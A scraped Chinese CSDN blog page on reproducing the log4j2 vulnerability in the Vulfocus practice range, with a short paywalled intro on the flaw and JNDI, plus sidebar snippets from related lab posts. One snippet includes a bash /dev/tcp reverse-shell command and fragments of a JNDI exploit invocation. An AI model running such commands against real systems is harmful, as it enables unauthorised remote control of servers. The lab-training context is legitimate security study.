使用Vulfocus复现log4j2

已于 2022-05-16 14:22:23 修改
阅读量885 收藏 4
点赞数 4
分类专栏: 漏洞复现 文章标签: 安全
于 2022-05-11 14:39:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Aquarius_ego/article/details/124706545
版权

log4j2漏洞介绍

漏洞原理

Apache Log4j2存在拒绝服务漏洞。该漏洞是由于Apache Log4j2配置了非默认的带有Context Lookup的Pattern Layout场景(例如:$${ctx:loginId})。

影响范围

Apache Apache Log4j >=2.0.0,< 2.17.0

Jndi基础

JNDI(Java Naming and Directory Interface,Java命名和目录接口)是SUN公司提供的一种标准的Java命名系统接口,JNDI提供统一的客户端API,通过不同的访问提供者接口JNDI服务供应接口(SPI)的实现,由管理者将JNDI API映射为特定的命名服务和目录系统,使得Java应用程序可以和这些命名服务和目录服务之间进行交互。目录服务是命名服务的一种自然扩展。两者之间的关键差别是目录服务中对象不但可以有名称还可以有属性(例如,用户有email地址),而命名服务中对象没有属性 。

集群JNDI实现了高可靠性JNDI,通过服务器的集群,保证了JNDI的负载平衡和错误恢复。在全局共享的方式下,集群中的一个

最低0.47元/天 解锁文章
Aquarius_ego
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
log4j2_rce 项目
02-23
总的来说,Log4j2 RCE漏洞提醒我们在使用开源软件时,必须密切关注安全更新,同时加强代码审查和系统防护。通过深入理解这个漏洞,我们可以更好地保护我们的系统免受此类攻击,并在日常工作中提升安全实践。
RabbitMQ【部署 01】一篇学会RabbitMQ服务依赖的下载安装及简单使用(首次登录 User can only log in via localhost 问题处理)(1)
2301_77121488的博客
05-08 994
也可以直接安装rabbitmq-server从报错信息里获取需要的版本,由于是同一个网站,下载的方式是一样的,这次也是直接下载安装文件。,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~此时服务已经可以使用了,但是,默认情况下,RabbitMQ是没有安装WEB端插件的,需要手动积获才可以生效。点击下载,可以进行联网下载安装也可以直接进行下载,本次选择直接下载安装文件。因篇幅有限,仅展示部分资料。还有大家最喜欢的黑客技术。
【安全攻防实验-4】Vulfocus练习-log4j2攻击准备
qq_26579613的博客
02-08 1216
1、环境准备 2、工具准备 2.1安装JNDI-Injection-Exploit git clone https://github.com/welk1n/JNDI-Injection-Exploit.git 2.2 安装MVN mkdip -p /usr/local/apache-maven cd /usr/local/apache-maven wget -c https://dlcdn.apache.org/maven/maven-3/3.8.4/bin...
用docker搭建的Vulfocus镜像管理界面没有镜像可以拉取解决办法
最新发布
YJ_12340的博客
05-29 1109
ps:截止到今天2023.4.2,kali和vps的docker拉取的vulfocus镜像会有版本的区别,虽然都是拉取的最新版,vps上镜像为3个月以前,kali上为16个月以前,==所以在修改 views.py 文件时,可能会发文件内容不一样==。版本不同也导致一键同步报错的解决办法在vps上可行,但是在kali上就不行。
JNDI(Java Naming and Directory Interface,Java命名和目录接口)
dengjuanshou7445的博客
08-26 307
JNDI(Java Naming and Directory Interface,Java命名和目录接口)是SUN公司提供的一种标准的Java命名系统接口,JNDI提供统一的客户端API,通过不同的访问提供者接口JNDI服务供应接口(SPI)的实,由管理者将JNDI API映射为特定的命名服务和目录系统,使得Java应用程序可以和这些命名服务和目录服务之间进行交互。目录服务是命名服务的...
vulfocuslog4j2-rce-2021-12-09
woai_zhongguo的博客
07-13 4547
log4j2远程rce漏洞
本地搭建vulfocus靶场&log4j2漏洞
xhscxj的博客
09-10 1907
环境用的是linux下的centos1.首先需要在centos中安装docker环境3.下载vulfocus镜像4.映射到centos中5.完成后访问centos的ip即可。
vulfocus靶场进不去
qq_62298519的博客
03-23 1788
docker是开启的,运行vulfocus的指令也没问题,ip,id都是正确的。但主机连接的时候就是失败。尝试手动关闭防火墙,发连接成功。
Vulfocuslog4j2和vulhublog4j2(CVE-2021-44228)
人若有志,就不会在半坡停止。
11-07 969
由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实目标服务器的任意代码执行,获得目标服务器权限。Log4j 是一款开源 Java 日志记录工具。日志记录主要用来监视代码中变量的变化情况,周期性的记录到文件中供其他应用进行统计分析工作;跟踪代码运行时轨迹,作为日后审计的依据;担当集成开发环境中的调试器的作用,向文件或控制台打印代码的调试信息。
通过vulfocus靶场--log4j2漏洞
weixin_55843787的博客
05-11 3423
vulfocus靶场、log4j2漏洞
虚拟机kali中docker拉取vulfocus靶场status:exited(1),主机地址访问不成功问题 求大神指导
Ling_es的博客
12-05 1088
主机:m1pro 虚拟机:pd装了kali linux 在kali里始终无法用主机地址访问 首先 docker没问题 拉取vulfocus镜像 没问题 创建容器没问题 但是不懂为什么status不是up,都是exited(1) 然后主机地址找不到vulfocus 检查日志 3天了,人麻了,不造哪儿的问题,求大神指导🙏
vulfocusLog4j2远程命令执行(CVE-2021-44228)
m0_71518346的博客
12-17 746
富的特性。该日志框架被大量用于业务Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰系统开发,用来记录日志信息。在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。成功利用该漏洞可在目标服务器上执行任意代码。
log4j2远程执行代码CVE-2021-44228vulfocus靶场)
m0_74294234的博客
03-31 351
bash -i >& /dev/tcp/(你服务器的公网IP地址)/8888(监听的端口号,我这里使用的是8888端口) 0>&1。1:首先打开finalshell或其他本地服务器上传,先创建一个ddd文件夹,并把下载的工具转移到该目录。}|{base64,-d}|{bash,-i}" -A "(你服务器的公网IP地址)"5:打开另一个终端端口并开启监听8888端口(8888端口是你在前面设置的监听端口)这样子就成功监听到端口,先进入tmp目录下,在输入ls可以爆出flag;6:用burpsuite抓包。
【靶场】vulfocus搭建和场景编排
信安是不可或缺的一部分!
05-30 2636
构建的场景中的主要选一下比较新的漏洞,不然会出横向移动很麻烦,还有一些漏洞需要回显,可能就会出一些问题导致无法无法成功,建议场景搭建好后测试一下可行性,因为是docker可能会有一些命令无法使用,这也会造成一些困难。
JNDI_小结
laiwenqiang的专栏
10-26 489
JNDI产生背景 访问数据库时,需要对JDBC驱动类进行编码,并通过URL提供用户名、密码和连接池等信息。 如: Connection conn=null; try { Class.forName("com.mysql.jdbc.Driver", true, Thread.currentThread().getContextClassLoader()); conn=Drive
log4j2漏洞在线
10-05
要在线log4j2漏洞,您可以按照以下步骤进行操作: 1. 编写一个Java类,包含恶意代码,例如上述提供的POC。 2. 确保您的Java环境中安装了受漏洞影响的log4j2版本。 3. 运行该Java类,并触发日志记录操作。 4. ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值